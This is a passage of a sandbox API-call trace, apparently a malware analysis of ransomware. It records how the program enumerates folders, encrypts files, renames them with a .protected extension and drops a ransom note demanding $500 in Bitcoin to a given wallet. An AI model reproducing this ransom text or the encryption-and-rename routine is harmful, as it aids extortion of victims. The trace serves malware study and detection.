\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.660] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.661] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.661] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.661] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.661] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.661] CloseHandle (hObject=0x164) returned 1 [0080.661] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0080.661] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru") returned 141 [0080.661] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0080.661] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0080.661] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*") returned 143 [0080.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.663] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.663] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\.") returned 143 [0080.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.663] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.663] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.663] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\..") returned 144 [0080.663] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.664] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.664] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.664] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.664] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.664] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.664] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.664] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0080.665] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.665] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0080.665] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.665] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.666] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.666] CloseHandle (hObject=0x168) returned 1 [0080.666] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected") returned 165 [0080.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected")) returned 1 [0080.666] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.666] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.666] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0080.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.667] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.667] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.668] lstrlenA (lpString="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") returned 684 [0080.668] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.668] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.668] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.668] CloseHandle (hObject=0x164) returned 1 [0080.668] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Windows") returned -1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Program Files") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Program Files (x86)") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="$Recycle.bin") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="System Volume Information") returned -1 [0080.668] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si") returned 141 [0080.668] lstrcmpW (lpString1="si", lpString2=".") returned 1 [0080.668] lstrcmpW (lpString1="si", lpString2="..") returned 1 [0080.668] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*") returned 143 [0080.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\.") returned 143 [0080.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.669] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\..") returned 144 [0080.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.669] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.669] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.669] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.669] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.669] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.670] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.670] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14e, lpOverlapped=0x0) returned 1 [0080.671] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14e, lpOverlapped=0x0) returned 1 [0080.671] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.671] CloseHandle (hObject=0x168) returned 1 [0080.671] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected") returned 165 [0080.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected")) returned 1 [0080.672] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.672] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.672] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\RESTORE_FILES.txt") returned 159 [0080.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.673] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.673] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.673] lstrlenA 
